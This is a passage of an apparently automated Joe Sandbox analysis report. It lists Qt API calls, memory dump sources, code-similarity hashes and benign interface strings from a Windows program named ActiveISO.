                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Data@@List$Long@$?dispose@Char@@Data@1@@$?begin@?end@?split@Array@@Behavior@1@ByteCaseList@@Qt@@@Sensitivity@SplitStringV0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3717193247-0
                                                                                                                  • Opcode ID: 650073b421a97ca21bf9084c6d68d05e3969ba1b84ac4a19abecb3812950dbca
                                                                                                                  • Instruction ID: ade38ec24af348603da6017ea55b353254de1d5f2d48e5d307fe252bf0b20db0
                                                                                                                  • Opcode Fuzzy Hash: 650073b421a97ca21bf9084c6d68d05e3969ba1b84ac4a19abecb3812950dbca
                                                                                                                  • Instruction Fuzzy Hash: 7E518D32F24A429AEB24CF64D9821BC3762FB44B59F4C4231CA1EB3694DF39E855C748
                                                                                                                  APIs
                                                                                                                  • ?takeChildren@QTreeWidgetItem@@QEAA?AV?$QList@PEAVQTreeWidgetItem@@@@XZ.QT5WIDGETS ref: 00007FF653713B8A
                                                                                                                  • ?size@QListData@@QEBAHXZ.QT5CORE ref: 00007FF653713B9C
                                                                                                                  • ?at@QListData@@QEBAPEAPEAXH@Z.QT5CORE ref: 00007FF653713BF2
                                                                                                                  • ?childCount@QTreeWidgetItem@@QEBAHXZ.QT5WIDGETS ref: 00007FF653713BFB
                                                                                                                  • ?at@QListData@@QEBAPEAPEAXH@Z.QT5CORE ref: 00007FF653713C37
                                                                                                                  • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE ref: 00007FF653713C8F
                                                                                                                  • ?at@QListData@@QEBAPEAPEAXH@Z.QT5CORE ref: 00007FF653713CE7
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653713D97
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653713DBF
                                                                                                                  • ?at@QListData@@QEBAPEAPEAXH@Z.QT5CORE ref: 00007FF653713E46
                                                                                                                    • Part of subcall function 00007FF6537141B0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF6537141C7
                                                                                                                    • Part of subcall function 00007FF6537141B0: ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF6537141D5
                                                                                                                    • Part of subcall function 00007FF6537141B0: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF6537141E6
                                                                                                                    • Part of subcall function 00007FF6537141B0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF6537141F2
                                                                                                                    • Part of subcall function 00007FF6537141B0: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF653714226
                                                                                                                    • Part of subcall function 00007FF6537147A0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF653714A5D
                                                                                                                    • Part of subcall function 00007FF6537147A0: ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,?,?,00000001,00007FF65371453F), ref: 00007FF653714A74
                                                                                                                  • ?size@QListData@@QEBAHXZ.QT5CORE ref: 00007FF653713EED
                                                                                                                    • Part of subcall function 00007FF653714150: ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,00000001,00007FF65371453F), ref: 00007FF653714181
                                                                                                                  • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FF653713F2D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@$List$Array$?at@$TreeU1@_Widget$?allocate@?begin@?dispose@?size@AllocationData@1@@Data@@@@@Flags@Item@@Option@String@@$?child?deallocate@?detach@?end@?takeArray@@ByteChildren@Count@Data@1@Item@@@@List@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1273789540-0
                                                                                                                  • Opcode ID: 82abecc48f12af53a31f52cd424e27d5ee03c3a7081a966374d28adf4f48d62a
                                                                                                                  • Instruction ID: 50bfe6b331b2ff6a1879d9825db3b4842a775a838fe9d0edf7bf7875ed8bf9b0
                                                                                                                  • Opcode Fuzzy Hash: 82abecc48f12af53a31f52cd424e27d5ee03c3a7081a966374d28adf4f48d62a
                                                                                                                  • Instruction Fuzzy Hash: 6CB1BF33F14A8586EB60DB25D4912A9B7A2FB84F94F58C132CA4EB3754DF38E449C744
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373ABB9
                                                                                                                  • ??BQCharRef@@QEBA?AVQChar@@XZ.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373ABFE
                                                                                                                  • ??0QString@@QEAA@VQChar@@@Z.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373AC0D
                                                                                                                  • ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373AC22
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373AC30
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373AC42
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373AC5F
                                                                                                                  • ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373AC74
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373AC82
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373AC94
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373ACA5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00000000,00000000,?,?,00007FF65372CA01), ref: 00007FF65373ACAF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$V0@@$?append@V1@@$?fromArrayArray@@Ascii_helper@ByteCharChar@@Char@@@Data@Ref@@Typed
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3447811568-0
                                                                                                                  • Opcode ID: e5c90685e7bf6c50db706e0a4cebc773c2b8dd54ca516c9ef2a442eb9dd56b7b
                                                                                                                  • Instruction ID: 930a89688677d3f6ddffaed11715307736e9729d3a6393d5c2b0735a52481775
                                                                                                                  • Opcode Fuzzy Hash: e5c90685e7bf6c50db706e0a4cebc773c2b8dd54ca516c9ef2a442eb9dd56b7b
                                                                                                                  • Instruction Fuzzy Hash: 3731E733D28A4196E720CF55F88617AB761FB84F90F454231EA9EA3A64DF3CD145C744
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$V0@@$?append@?fromArray@@ByteV1@@$?text@ArrayAscii_helper@Data@Item@@TreeTypedUtf8@Widget
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 389191807-0
                                                                                                                  • Opcode ID: 2e3a73eadb35d48b58057d513ddd830d7a3fcf8a09125daee27e6d8c7f7cd849
                                                                                                                  • Instruction ID: 968a42a4738df2d888a97ae3180065ae21e8ae2e2132836c12d48b245ff41ae2
                                                                                                                  • Opcode Fuzzy Hash: 2e3a73eadb35d48b58057d513ddd830d7a3fcf8a09125daee27e6d8c7f7cd849
                                                                                                                  • Instruction Fuzzy Hash: DF21B672E28A4197F710CF64E88216A7762FB84F91F440231E69EB6A78DF3CD509CB44
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Char@@@Data@MessageStandardTyped$?arg@?critical@Box@@Box@@@@Button@Button@1@Char@@Flags@Latin1String@@1W421@@Widget@@
                                                                                                                  • String ID: Conflict detected$Item: %1Item name you specified already exists.Copying is cancelled.
                                                                                                                  • API String ID: 376045176-3233527137
                                                                                                                  • Opcode ID: ac596df5ec0257bf9c9fcffe7c48bfc86fa31dee3bdd3273892ce5d102e324cd
                                                                                                                  • Instruction ID: 7b1968d602df740c53fc8d34c247755a489af0705c92c39e1e7ac7a62263dbd5
                                                                                                                  • Opcode Fuzzy Hash: ac596df5ec0257bf9c9fcffe7c48bfc86fa31dee3bdd3273892ce5d102e324cd
                                                                                                                  • Instruction Fuzzy Hash: 02117F32A28B8197F700CB60F8921696361FB88F85F851031EA4EA3B74DF3CD548C744
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@$memsetstrncpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4229330386-0
                                                                                                                  • Opcode ID: f48b62877cf745a0a4a3a582b3508abde463c90f2d463ce7d0c9c2d514b7303a
                                                                                                                  • Instruction ID: 8ae9c95f4d8077f4c74ca04d3dc5149ba1d1aedd08379a1e1d8cf88f30317917
                                                                                                                  • Opcode Fuzzy Hash: f48b62877cf745a0a4a3a582b3508abde463c90f2d463ce7d0c9c2d514b7303a
                                                                                                                  • Instruction Fuzzy Hash: CA319A21F28B8195EA10DB25E8522B97362FF86FA0F480131D98EF7794EF2CD504C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Brush@@$Tree$Item@@Widget$?setBackground@BrushBrush@@@$Qt@@@Style@$?item?pos@Color@DropEvent@@GlobalPoint@@Point@@@Qt@@Style@2@@Widget@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 735912260-0
                                                                                                                  • Opcode ID: 14a954680b19a70887781c596f5fe3a492bcf2e12ef18dbf637c35b11787429e
                                                                                                                  • Instruction ID: ccd28599f367bb7c22ec859eb218e4b3a24839d89e923dbf0c269717df0a424e
                                                                                                                  • Opcode Fuzzy Hash: 14a954680b19a70887781c596f5fe3a492bcf2e12ef18dbf637c35b11787429e
                                                                                                                  • Instruction Fuzzy Hash: 9E213D25E38A41D2EB448F65E9491696363FFC9F85F485032DA0EE2668EF3CD818C708
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$MessageStandard$?current?information@Array@@Box@@Box@@@@Button@Button@1@ByteFlags@String@@1V0@$$V0@@W421@@Widget@@Wizard@@
                                                                                                                  • String ID: Registration & Licensing Help$This help is likely not to be of any help.
                                                                                                                  • API String ID: 1934070877-3888389815
                                                                                                                  • Opcode ID: 8ad66f73da6d64b25405f5b1d3c723343f035ea02500e0103d96cbe04dd7171f
                                                                                                                  • Instruction ID: 0b98be84eb51ec270aa7059a3eefdac3c8b5a80b1a6c6eab944b5e728eaff67a
                                                                                                                  • Opcode Fuzzy Hash: 8ad66f73da6d64b25405f5b1d3c723343f035ea02500e0103d96cbe04dd7171f
                                                                                                                  • Instruction Fuzzy Hash: D3219832E2490295F7608B34D8565B82722EF41FA8F4C1330E46EF29E4DF2CE549C388
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?sprintf@
                                                                                                                  • String ID: %.0f GB$%.0f KB$%.0f MB$%d bytes
                                                                                                                  • API String ID: 3595773351-687617133
                                                                                                                  • Opcode ID: afdb49c32e89c1ebaef8d39ae27c9c7831163e74ed630b5e702fd983686e4cbb
                                                                                                                  • Instruction ID: ee68558605ca837a2aea21effdb1dbf6dfa7f3119595135779a72d77f2085c8f
                                                                                                                  • Opcode Fuzzy Hash: afdb49c32e89c1ebaef8d39ae27c9c7831163e74ed630b5e702fd983686e4cbb
                                                                                                                  • Instruction Fuzzy Hash: 85215E21F3CA4581EA015B1AF9413649322EF48FC8F4C4231DE1DF2675DF6DE0948748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • Update Help, xrefs: 00007FF6537497DA
                                                                                                                  • This is a confirmation of successfull or unsuccessfull update.<br><br>In case if the software has been updated successfully, the latest version will be started after you close the application and launch it again.<br><br>In case if any errors occured while down, xrefs: 00007FF653749787
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$MessageStandard$?current?information@Array@@Box@@Box@@@@Button@Button@1@ByteFlags@String@@1V0@$$V0@@W421@@Widget@@Wizard@@
                                                                                                                  • String ID: This is a confirmation of successfull or unsuccessfull update.<br><br>In case if the software has been updated successfully, the latest version will be started after you close the application and launch it again.<br><br>In case if any errors occured while down$Update Help
                                                                                                                  • API String ID: 1934070877-1454903161
                                                                                                                  • Opcode ID: f117bbda507c6952ce0a32691b8c4b17cc96f91b3ab7399b51ca91fbadece742
                                                                                                                  • Instruction ID: 047f2ffce8487e3c44132597842d70e4611104d94507651049af1654c51f80a4
                                                                                                                  • Opcode Fuzzy Hash: f117bbda507c6952ce0a32691b8c4b17cc96f91b3ab7399b51ca91fbadece742
                                                                                                                  • Instruction Fuzzy Hash: DE11B761E38A4691FA109F65E84257A5313FF82F60F481235D5AEF29E4DF2CF508C748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Settings@@String@@$?beginGroup@String@@@$?from?setArrayAscii_helper@Codec@Data@Format@0@Object@@@Typed
                                                                                                                  • String ID: Registration$UTF-8
                                                                                                                  • API String ID: 2984805951-3179862410
                                                                                                                  • Opcode ID: 0d632a24496cf5a56ce11919dd2b7b0f14996e8e0f734f5f96603ef9f42adfc6
                                                                                                                  • Instruction ID: 73b7c17906a5d82d2f6329290e9085403b087f4780c89a3828fe60bb0b4e0c15
                                                                                                                  • Opcode Fuzzy Hash: 0d632a24496cf5a56ce11919dd2b7b0f14996e8e0f734f5f96603ef9f42adfc6
                                                                                                                  • Instruction Fuzzy Hash: A0114236E18B42D2EB108F51F8451697362FB85FA1F484231D96EB67A4DF7CD448C748
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537422DB
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF6537422FE
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742311
                                                                                                                  • ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374232B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742337
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742343
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653742353
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF65374235F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
